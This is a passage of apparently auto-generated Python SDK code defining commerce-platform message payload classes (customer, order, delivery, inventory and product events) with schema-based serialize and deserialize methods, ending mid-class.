resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReviewStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewStateTransitionMessage":
from ._schemas.message import ReviewStateTransitionMessageSchema
return ReviewStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewStateTransitionMessageSchema
return ReviewStateTransitionMessageSchema().dump(self)
class UserProvidedIdentifiers(_BaseType):
key: typing.Optional[str]
external_id: typing.Optional[str]
order_number: typing.Optional[str]
customer_number: typing.Optional[str]
sku: typing.Optional[str]
slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
key: typing.Optional[str] = None,
external_id: typing.Optional[str] = None,
order_number: typing.Optional[str] = None,
customer_number: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
slug: typing.Optional["LocalizedString"] = None
):
self.key = key
self.external_id = external_id
self.order_number = order_number
self.customer_number = customer_number
self.sku = sku
self.slug = slug
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "UserProvidedIdentifiers":
from ._schemas.message import UserProvidedIdentifiersSchema
return UserProvidedIdentifiersSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import UserProvidedIdentifiersSchema
return UserProvidedIdentifiersSchema().dump(self)
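# Illustrative sketch (not generated): every field of UserProvidedIdentifiers is
# optional, so instances can be built from any subset of identifiers. Values
# below are placeholders:
#
#     identifiers = UserProvidedIdentifiers(order_number="1001", sku="SKU-123")
#     # unspecified attributes (key, external_id, customer_number, slug) remain None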
class MessagePayload(_BaseType):
type: str
def __init__(self, *, type: str):
self.type = type
super().__init__()
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "MessagePayload":
if data["type"] == "CategoryCreated":
from ._schemas.message import CategoryCreatedMessagePayloadSchema
return CategoryCreatedMessagePayloadSchema().load(data)
if data["type"] == "CategorySlugChanged":
from ._schemas.message import CategorySlugChangedMessagePayloadSchema
return CategorySlugChangedMessagePayloadSchema().load(data)
if data["type"] == "CustomLineItemStateTransition":
from ._schemas.message import (
CustomLineItemStateTransitionMessagePayloadSchema,
)
return CustomLineItemStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "CustomerAddressAdded":
from ._schemas.message import CustomerAddressAddedMessagePayloadSchema
return CustomerAddressAddedMessagePayloadSchema().load(data)
if data["type"] == "CustomerAddressChanged":
from ._schemas.message import CustomerAddressChangedMessagePayloadSchema
return CustomerAddressChangedMessagePayloadSchema().load(data)
if data["type"] == "CustomerAddressRemoved":
from ._schemas.message import CustomerAddressRemovedMessagePayloadSchema
return CustomerAddressRemovedMessagePayloadSchema().load(data)
if data["type"] == "CustomerCompanyNameSet":
from ._schemas.message import CustomerCompanyNameSetMessagePayloadSchema
return CustomerCompanyNameSetMessagePayloadSchema().load(data)
if data["type"] == "CustomerCreated":
from ._schemas.message import CustomerCreatedMessagePayloadSchema
return CustomerCreatedMessagePayloadSchema().load(data)
if data["type"] == "CustomerDateOfBirthSet":
from ._schemas.message import CustomerDateOfBirthSetMessagePayloadSchema
return CustomerDateOfBirthSetMessagePayloadSchema().load(data)
if data["type"] == "CustomerEmailChanged":
from ._schemas.message import CustomerEmailChangedMessagePayloadSchema
return CustomerEmailChangedMessagePayloadSchema().load(data)
if data["type"] == "CustomerEmailVerified":
from ._schemas.message import CustomerEmailVerifiedMessagePayloadSchema
return CustomerEmailVerifiedMessagePayloadSchema().load(data)
if data["type"] == "CustomerGroupSet":
from ._schemas.message import CustomerGroupSetMessagePayloadSchema
return CustomerGroupSetMessagePayloadSchema().load(data)
if data["type"] == "CustomerPasswordUpdated":
from ._schemas.message import CustomerPasswordUpdatedMessagePayloadSchema
return CustomerPasswordUpdatedMessagePayloadSchema().load(data)
if data["type"] == "DeliveryAdded":
from ._schemas.message import DeliveryAddedMessagePayloadSchema
return DeliveryAddedMessagePayloadSchema().load(data)
if data["type"] == "DeliveryAddressSet":
from ._schemas.message import DeliveryAddressSetMessagePayloadSchema
return DeliveryAddressSetMessagePayloadSchema().load(data)
if data["type"] == "DeliveryItemsUpdated":
from ._schemas.message import DeliveryItemsUpdatedMessagePayloadSchema
return DeliveryItemsUpdatedMessagePayloadSchema().load(data)
if data["type"] == "DeliveryRemoved":
from ._schemas.message import DeliveryRemovedMessagePayloadSchema
return DeliveryRemovedMessagePayloadSchema().load(data)
if data["type"] == "InventoryEntryCreated":
from ._schemas.message import InventoryEntryCreatedMessagePayloadSchema
return InventoryEntryCreatedMessagePayloadSchema().load(data)
if data["type"] == "InventoryEntryDeleted":
from ._schemas.message import InventoryEntryDeletedMessagePayloadSchema
return InventoryEntryDeletedMessagePayloadSchema().load(data)
if data["type"] == "InventoryEntryQuantitySet":
from ._schemas.message import InventoryEntryQuantitySetMessagePayloadSchema
return InventoryEntryQuantitySetMessagePayloadSchema().load(data)
if data["type"] == "LineItemStateTransition":
from ._schemas.message import LineItemStateTransitionMessagePayloadSchema
return LineItemStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "OrderBillingAddressSet":
from ._schemas.message import OrderBillingAddressSetMessagePayloadSchema
return OrderBillingAddressSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCreated":
from ._schemas.message import OrderCreatedMessagePayloadSchema
return OrderCreatedMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomLineItemDiscountSet":
from ._schemas.message import (
OrderCustomLineItemDiscountSetMessagePayloadSchema,
)
return OrderCustomLineItemDiscountSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomerEmailSet":
from ._schemas.message import OrderCustomerEmailSetMessagePayloadSchema
return OrderCustomerEmailSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomerGroupSet":
from ._schemas.message import OrderCustomerGroupSetMessagePayloadSchema
return OrderCustomerGroupSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomerSet":
from ._schemas.message import OrderCustomerSetMessagePayloadSchema
return OrderCustomerSetMessagePayloadSchema().load(data)
if data["type"] == "OrderDeleted":
from ._schemas.message import OrderDeletedMessagePayloadSchema
return OrderDeletedMessagePayloadSchema().load(data)
if data["type"] == "OrderDiscountCodeAdded":
from ._schemas.message import OrderDiscountCodeAddedMessagePayloadSchema
return OrderDiscountCodeAddedMessagePayloadSchema().load(data)
if data["type"] == "OrderDiscountCodeRemoved":
from ._schemas.message import OrderDiscountCodeRemovedMessagePayloadSchema
return OrderDiscountCodeRemovedMessagePayloadSchema().load(data)
if data["type"] == "OrderDiscountCodeStateSet":
from ._schemas.message import OrderDiscountCodeStateSetMessagePayloadSchema
return OrderDiscountCodeStateSetMessagePayloadSchema().load(data)
if data["type"] == "OrderEditApplied":
from ._schemas.message import OrderEditAppliedMessagePayloadSchema
return OrderEditAppliedMessagePayloadSchema().load(data)
if data["type"] == "OrderImported":
from ._schemas.message import OrderImportedMessagePayloadSchema
return OrderImportedMessagePayloadSchema().load(data)
if data["type"] == "OrderLineItemAdded":
from ._schemas.message import OrderLineItemAddedMessagePayloadSchema
return OrderLineItemAddedMessagePayloadSchema().load(data)
if data["type"] == "OrderLineItemDiscountSet":
from ._schemas.message import OrderLineItemDiscountSetMessagePayloadSchema
return OrderLineItemDiscountSetMessagePayloadSchema().load(data)
if data["type"] == "OrderPaymentStateChanged":
from ._schemas.message import OrderPaymentStateChangedMessagePayloadSchema
return OrderPaymentStateChangedMessagePayloadSchema().load(data)
if data["type"] == "ReturnInfoAdded":
from ._schemas.message import OrderReturnInfoAddedMessagePayloadSchema
return OrderReturnInfoAddedMessagePayloadSchema().load(data)
if data["type"] == "OrderReturnShipmentStateChanged":
from ._schemas.message import (
OrderReturnShipmentStateChangedMessagePayloadSchema,
)
return OrderReturnShipmentStateChangedMessagePayloadSchema().load(data)
if data["type"] == "OrderShipmentStateChanged":
from ._schemas.message import OrderShipmentStateChangedMessagePayloadSchema
return OrderShipmentStateChangedMessagePayloadSchema().load(data)
if data["type"] == "OrderShippingAddressSet":
from ._schemas.message import OrderShippingAddressSetMessagePayloadSchema
return OrderShippingAddressSetMessagePayloadSchema().load(data)
if data["type"] == "OrderShippingInfoSet":
from ._schemas.message import OrderShippingInfoSetMessagePayloadSchema
return OrderShippingInfoSetMessagePayloadSchema().load(data)
if data["type"] == "OrderShippingRateInputSet":
from ._schemas.message import OrderShippingRateInputSetMessagePayloadSchema
return OrderShippingRateInputSetMessagePayloadSchema().load(data)
if data["type"] == "OrderStateChanged":
from ._schemas.message import OrderStateChangedMessagePayloadSchema
return OrderStateChangedMessagePayloadSchema().load(data)
if data["type"] == "OrderStateTransition":
from ._schemas.message import OrderStateTransitionMessagePayloadSchema
return OrderStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "OrderStoreSet":
from ._schemas.message import OrderStoreSetMessagePayloadSchema
return OrderStoreSetMessagePayloadSchema().load(data)
if data["type"] == "ParcelAddedToDelivery":
from ._schemas.message import ParcelAddedToDeliveryMessagePayloadSchema
return ParcelAddedToDeliveryMessagePayloadSchema().load(data)
if data["type"] == "ParcelItemsUpdated":
from ._schemas.message import ParcelItemsUpdatedMessagePayloadSchema
return ParcelItemsUpdatedMessagePayloadSchema().load(data)
if data["type"] == "ParcelMeasurementsUpdated":
from ._schemas.message import ParcelMeasurementsUpdatedMessagePayloadSchema
return ParcelMeasurementsUpdatedMessagePayloadSchema().load(data)
if data["type"] == "ParcelRemovedFromDelivery":
from ._schemas.message import ParcelRemovedFromDeliveryMessagePayloadSchema
return ParcelRemovedFromDeliveryMessagePayloadSchema().load(data)
if data["type"] == "ParcelTrackingDataUpdated":
from ._schemas.message import ParcelTrackingDataUpdatedMessagePayloadSchema
return ParcelTrackingDataUpdatedMessagePayloadSchema().load(data)
if data["type"] == "PaymentCreated":
from ._schemas.message import PaymentCreatedMessagePayloadSchema
return PaymentCreatedMessagePayloadSchema().load(data)
if data["type"] == "PaymentInteractionAdded":
from ._schemas.message import PaymentInteractionAddedMessagePayloadSchema
return PaymentInteractionAddedMessagePayloadSchema().load(data)
if data["type"] == "PaymentStatusInterfaceCodeSet":
from ._schemas.message import (
PaymentStatusInterfaceCodeSetMessagePayloadSchema,
)
return PaymentStatusInterfaceCodeSetMessagePayloadSchema().load(data)
if data["type"] == "PaymentStatusStateTransition":
from ._schemas.message import (
PaymentStatusStateTransitionMessagePayloadSchema,
)
return PaymentStatusStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "PaymentTransactionAdded":
from ._schemas.message import PaymentTransactionAddedMessagePayloadSchema
return PaymentTransactionAddedMessagePayloadSchema().load(data)
if data["type"] == "PaymentTransactionStateChanged":
from ._schemas.message import (
PaymentTransactionStateChangedMessagePayloadSchema,
)
return PaymentTransactionStateChangedMessagePayloadSchema().load(data)
if data["type"] == "ProductAddedToCategory":
from ._schemas.message import ProductAddedToCategoryMessagePayloadSchema
return ProductAddedToCategoryMessagePayloadSchema().load(data)
if data["type"] == "ProductCreated":
from ._schemas.message import ProductCreatedMessagePayloadSchema
return ProductCreatedMessagePayloadSchema().load(data)
if data["type"] == "ProductDeleted":
from ._schemas.message import ProductDeletedMessagePayloadSchema
return ProductDeletedMessagePayloadSchema().load(data)
if data["type"] == "ProductImageAdded":
from ._schemas.message import ProductImageAddedMessagePayloadSchema
return ProductImageAddedMessagePayloadSchema().load(data)
if data["type"] == "ProductPriceDiscountsSet":
from ._schemas.message import ProductPriceDiscountsSetMessagePayloadSchema
return ProductPriceDiscountsSetMessagePayloadSchema().load(data)
if data["type"] == "ProductPriceExternalDiscountSet":
from ._schemas.message import (
ProductPriceExternalDiscountSetMessagePayloadSchema,
)
return ProductPriceExternalDiscountSetMessagePayloadSchema().load(data)
if data["type"] == "ProductPublished":
from ._schemas.message import ProductPublishedMessagePayloadSchema
return ProductPublishedMessagePayloadSchema().load(data)
if data["type"] == "ProductRemovedFromCategory":
from ._schemas.message import ProductRemovedFromCategoryMessagePayloadSchema
return ProductRemovedFromCategoryMessagePayloadSchema().load(data)
if data["type"] == "ProductRevertedStagedChanges":
from ._schemas.message import (
ProductRevertedStagedChangesMessagePayloadSchema,
)
return ProductRevertedStagedChangesMessagePayloadSchema().load(data)
if data["type"] == "ProductSlugChanged":
from ._schemas.message import ProductSlugChangedMessagePayloadSchema
return ProductSlugChangedMessagePayloadSchema().load(data)
if data["type"] == "ProductStateTransition":
from ._schemas.message import ProductStateTransitionMessagePayloadSchema
return ProductStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "ProductUnpublished":
from ._schemas.message import ProductUnpublishedMessagePayloadSchema
return ProductUnpublishedMessagePayloadSchema().load(data)
if data["type"] == "ProductVariantAdded":
from ._schemas.message import ProductVariantAddedMessagePayloadSchema
return ProductVariantAddedMessagePayloadSchema().load(data)
if data["type"] == "ProductVariantDeleted":
from ._schemas.message import ProductVariantDeletedMessagePayloadSchema
return ProductVariantDeletedMessagePayloadSchema().load(data)
if data["type"] == "ReviewCreated":
from ._schemas.message import ReviewCreatedMessagePayloadSchema
return ReviewCreatedMessagePayloadSchema().load(data)
if data["type"] == "ReviewRatingSet":
from ._schemas.message import ReviewRatingSetMessagePayloadSchema
return ReviewRatingSetMessagePayloadSchema().load(data)
if data["type"] == "ReviewStateTransition":
from ._schemas.message import ReviewStateTransitionMessagePayloadSchema
return ReviewStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "ShoppingListStoreSet":
from ._schemas.message import ShoppingListStoreSetMessagePayloadSchema
return ShoppingListStoreSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessagePayloadSchema
return MessagePayloadSchema().dump(self)
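# Descriptive note (not generated): MessagePayload.deserialize dispatches on
# data["type"] to the matching payload schema; if no branch matches, the method
# falls through and implicitly returns None. A hypothetical dispatch example
# (the "email" key mirrors the field name and is assumed here):
#
#     payload = MessagePayload.deserialize(
#         {"type": "CustomerEmailChanged", "email": "user@example.com"}
#     )
#     # payload is a CustomerEmailChangedMessagePayload instance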
class CategoryCreatedMessagePayload(MessagePayload):
category: "Category"
def __init__(self, *, category: "Category"):
self.category = category
super().__init__(type="CategoryCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategoryCreatedMessagePayload":
from ._schemas.message import CategoryCreatedMessagePayloadSchema
return CategoryCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategoryCreatedMessagePayloadSchema
return CategoryCreatedMessagePayloadSchema().dump(self)
class CategorySlugChangedMessagePayload(MessagePayload):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(type="CategorySlugChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategorySlugChangedMessagePayload":
from ._schemas.message import CategorySlugChangedMessagePayloadSchema
return CategorySlugChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategorySlugChangedMessagePayloadSchema
return CategorySlugChangedMessagePayloadSchema().dump(self)
class CustomLineItemStateTransitionMessagePayload(MessagePayload):
custom_line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
custom_line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.custom_line_item_id = custom_line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(type="CustomLineItemStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomLineItemStateTransitionMessagePayload":
from ._schemas.message import CustomLineItemStateTransitionMessagePayloadSchema
return CustomLineItemStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomLineItemStateTransitionMessagePayloadSchema
return CustomLineItemStateTransitionMessagePayloadSchema().dump(self)
class CustomerAddressAddedMessagePayload(MessagePayload):
address: "Address"
def __init__(self, *, address: "Address"):
self.address = address
super().__init__(type="CustomerAddressAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressAddedMessagePayload":
from ._schemas.message import CustomerAddressAddedMessagePayloadSchema
return CustomerAddressAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressAddedMessagePayloadSchema
return CustomerAddressAddedMessagePayloadSchema().dump(self)
class CustomerAddressChangedMessagePayload(MessagePayload):
address: "Address"
def __init__(self, *, address: "Address"):
self.address = address
super().__init__(type="CustomerAddressChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressChangedMessagePayload":
from ._schemas.message import CustomerAddressChangedMessagePayloadSchema
return CustomerAddressChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressChangedMessagePayloadSchema
return CustomerAddressChangedMessagePayloadSchema().dump(self)
class CustomerAddressRemovedMessagePayload(MessagePayload):
address: "Address"
def __init__(self, *, address: "Address"):
self.address = address
super().__init__(type="CustomerAddressRemoved")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressRemovedMessagePayload":
from ._schemas.message import CustomerAddressRemovedMessagePayloadSchema
return CustomerAddressRemovedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressRemovedMessagePayloadSchema
return CustomerAddressRemovedMessagePayloadSchema().dump(self)
class CustomerCompanyNameSetMessagePayload(MessagePayload):
company_name: str
def __init__(self, *, company_name: str):
self.company_name = company_name
super().__init__(type="CustomerCompanyNameSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCompanyNameSetMessagePayload":
from ._schemas.message import CustomerCompanyNameSetMessagePayloadSchema
return CustomerCompanyNameSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCompanyNameSetMessagePayloadSchema
return CustomerCompanyNameSetMessagePayloadSchema().dump(self)
class CustomerCreatedMessagePayload(MessagePayload):
customer: "Customer"
def __init__(self, *, customer: "Customer"):
self.customer = customer
super().__init__(type="CustomerCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCreatedMessagePayload":
from ._schemas.message import CustomerCreatedMessagePayloadSchema
return CustomerCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCreatedMessagePayloadSchema
return CustomerCreatedMessagePayloadSchema().dump(self)
class CustomerDateOfBirthSetMessagePayload(MessagePayload):
date_of_birth: datetime.date
def __init__(self, *, date_of_birth: datetime.date):
self.date_of_birth = date_of_birth
super().__init__(type="CustomerDateOfBirthSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerDateOfBirthSetMessagePayload":
from ._schemas.message import CustomerDateOfBirthSetMessagePayloadSchema
return CustomerDateOfBirthSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerDateOfBirthSetMessagePayloadSchema
return CustomerDateOfBirthSetMessagePayloadSchema().dump(self)
class CustomerEmailChangedMessagePayload(MessagePayload):
email: str
def __init__(self, *, email: str):
self.email = email
super().__init__(type="CustomerEmailChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailChangedMessagePayload":
from ._schemas.message import CustomerEmailChangedMessagePayloadSchema
return CustomerEmailChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailChangedMessagePayloadSchema
return CustomerEmailChangedMessagePayloadSchema().dump(self)
class CustomerEmailVerifiedMessagePayload(MessagePayload):
def __init__(self):
super().__init__(type="CustomerEmailVerified")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailVerifiedMessagePayload":
from ._schemas.message import CustomerEmailVerifiedMessagePayloadSchema
return CustomerEmailVerifiedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailVerifiedMessagePayloadSchema
return CustomerEmailVerifiedMessagePayloadSchema().dump(self)
class CustomerGroupSetMessagePayload(MessagePayload):
customer_group: "CustomerGroupReference"
def __init__(self, *, customer_group: "CustomerGroupReference"):
self.customer_group = customer_group
super().__init__(type="CustomerGroupSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerGroupSetMessagePayload":
from ._schemas.message import CustomerGroupSetMessagePayloadSchema
return CustomerGroupSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerGroupSetMessagePayloadSchema
return CustomerGroupSetMessagePayloadSchema().dump(self)
class CustomerPasswordUpdatedMessagePayload(MessagePayload):
    #: True if the password has been updated during the Customer's Password Reset workflow.
reset: bool
def __init__(self, *, reset: bool):
self.reset = reset
super().__init__(type="CustomerPasswordUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerPasswordUpdatedMessagePayload":
from ._schemas.message import CustomerPasswordUpdatedMessagePayloadSchema
return CustomerPasswordUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerPasswordUpdatedMessagePayloadSchema
return CustomerPasswordUpdatedMessagePayloadSchema().dump(self)
class DeliveryAddedMessagePayload(MessagePayload):
delivery: "Delivery"
def __init__(self, *, delivery: "Delivery"):
self.delivery = delivery
super().__init__(type="DeliveryAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryAddedMessagePayload":
from ._schemas.message import DeliveryAddedMessagePayloadSchema
return DeliveryAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddedMessagePayloadSchema
return DeliveryAddedMessagePayloadSchema().dump(self)
class DeliveryAddressSetMessagePayload(MessagePayload):
delivery_id: str
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
delivery_id: str,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.delivery_id = delivery_id
self.address = address
self.old_address = old_address
super().__init__(type="DeliveryAddressSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryAddressSetMessagePayload":
from ._schemas.message import DeliveryAddressSetMessagePayloadSchema
return DeliveryAddressSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddressSetMessagePayloadSchema
return DeliveryAddressSetMessagePayloadSchema().dump(self)
class DeliveryItemsUpdatedMessagePayload(MessagePayload):
delivery_id: str
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
delivery_id: str,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(type="DeliveryItemsUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryItemsUpdatedMessagePayload":
from ._schemas.message import DeliveryItemsUpdatedMessagePayloadSchema
return DeliveryItemsUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryItemsUpdatedMessagePayloadSchema
return DeliveryItemsUpdatedMessagePayloadSchema().dump(self)
class DeliveryRemovedMessagePayload(MessagePayload):
delivery: "Delivery"
def __init__(self, *, delivery: "Delivery"):
self.delivery = delivery
super().__init__(type="DeliveryRemoved")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryRemovedMessagePayload":
from ._schemas.message import DeliveryRemovedMessagePayloadSchema
return DeliveryRemovedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryRemovedMessagePayloadSchema
return DeliveryRemovedMessagePayloadSchema().dump(self)
class InventoryEntryCreatedMessagePayload(MessagePayload):
inventory_entry: "InventoryEntry"
def __init__(self, *, inventory_entry: "InventoryEntry"):
self.inventory_entry = inventory_entry
super().__init__(type="InventoryEntryCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryCreatedMessagePayload":
from ._schemas.message import InventoryEntryCreatedMessagePayloadSchema
return InventoryEntryCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryCreatedMessagePayloadSchema
return InventoryEntryCreatedMessagePayloadSchema().dump(self)
class InventoryEntryDeletedMessagePayload(MessagePayload):
sku: str
supply_channel: "ChannelReference"
def __init__(self, *, sku: str, supply_channel: "ChannelReference"):
self.sku = sku
self.supply_channel = supply_channel
super().__init__(type="InventoryEntryDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryDeletedMessagePayload":
from ._schemas.message import InventoryEntryDeletedMessagePayloadSchema
return InventoryEntryDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryDeletedMessagePayloadSchema
return InventoryEntryDeletedMessagePayloadSchema().dump(self)
class InventoryEntryQuantitySetMessagePayload(MessagePayload):
old_quantity_on_stock: int
new_quantity_on_stock: int
old_available_quantity: int
new_available_quantity: int
def __init__(
self,
*,
old_quantity_on_stock: int,
new_quantity_on_stock: int,
old_available_quantity: int,
new_available_quantity: int
):
self.old_quantity_on_stock = old_quantity_on_stock
self.new_quantity_on_stock = new_quantity_on_stock
self.old_available_quantity = old_available_quantity
self.new_available_quantity = new_available_quantity
super().__init__(type="InventoryEntryQuantitySet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryQuantitySetMessagePayload":
from ._schemas.message import InventoryEntryQuantitySetMessagePayloadSchema
return InventoryEntryQuantitySetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryQuantitySetMessagePayloadSchema
return InventoryEntryQuantitySetMessagePayloadSchema().dump(self)
class LineItemStateTransitionMessagePayload(MessagePayload):
line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.line_item_id = line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(type="LineItemStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "LineItemStateTransitionMessagePayload":
from ._schemas.message import LineItemStateTransitionMessagePayloadSchema
return LineItemStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import LineItemStateTransitionMessagePayloadSchema
return LineItemStateTransitionMessagePayloadSchema().dump(self)
class OrderBillingAddressSetMessagePayload(MessagePayload):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(type="OrderBillingAddressSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderBillingAddressSetMessagePayload":
from ._schemas.message import OrderBillingAddressSetMessagePayloadSchema
return OrderBillingAddressSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderBillingAddressSetMessagePayloadSchema
return OrderBillingAddressSetMessagePayloadSchema().dump(self)
class OrderCreatedMessagePayload(MessagePayload):
order: "Order"
def __init__(self, *, order: "Order"):
self.order = order
super().__init__(type="OrderCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCreatedMessagePayload":
from ._schemas.message import OrderCreatedMessagePayloadSchema
return OrderCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCreatedMessagePayloadSchema
return OrderCreatedMessagePayloadSchema().dump(self)
class OrderCustomLineItemDiscountSetMessagePayload(MessagePayload):
custom_line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
custom_line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.custom_line_item_id = custom_line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.taxed_price = taxed_price
super().__init__(type="OrderCustomLineItemDiscountSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomLineItemDiscountSetMessagePayload":
from ._schemas.message import OrderCustomLineItemDiscountSetMessagePayloadSchema
return OrderCustomLineItemDiscountSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomLineItemDiscountSetMessagePayloadSchema
return OrderCustomLineItemDiscountSetMessagePayloadSchema().dump(self)
class OrderCustomerEmailSetMessagePayload(MessagePayload):
email: typing.Optional[str]
old_email: typing.Optional[str]
def __init__(
self,
*,
email: typing.Optional[str] = None,
old_email: typing.Optional[str] = None
):
self.email = email
self.old_email = old_email
super().__init__(type="OrderCustomerEmailSet")
@classmethod
